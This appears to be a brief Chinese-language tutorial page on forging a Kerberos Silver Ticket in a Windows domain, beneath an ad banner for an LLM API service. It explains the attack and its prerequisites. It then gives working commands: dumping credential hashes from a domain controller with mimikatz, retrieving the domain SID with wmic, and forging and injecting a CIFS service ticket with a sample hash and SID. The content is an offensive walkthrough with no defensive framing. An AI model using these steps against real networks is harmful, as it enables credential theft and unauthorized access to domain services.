💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、豆包、星火、月之暗面及文生图、文生视频 广告
[TOC] ## 简介 * 白银票据(Silver Ticket),利用过程是伪造TGS * 通过已知的授权服务密码生成一张可以访问该服务的票据 * 白银票据生成过程中,不需要经过KDC,不需要域域控交互 * 白银票据依赖服务账户的密码散列值 * 常见服务:LDAP、MSSQL、DNS、CIFS等 ## 准备 * 域名 * 域SID * 目标服务器的FQDN * 可利用的服务 * 服务账号的 NTLM Hash * 需要伪造的用户名 ## 获取服务账号NTLM hash ~~~ 在域控制器中,使用mimikatz获取服务账号的NTLM Hash: • privilege::debug • log • sekurlsa::logonpasswords ~~~ ## 获取域的sid ~~~ wmic useraccount get name,sid ~~~ ## 伪造白银票据 ~~~ kerberos::golden /domain:dongta.test /sid:S-1-5-21-4119513073-439187860-1128162503 /target:dc1.dongta.test /service:cifs/rc4:6132fb5faf882353142d7b6aec2ae519 /user:server0801 /ptt ~~~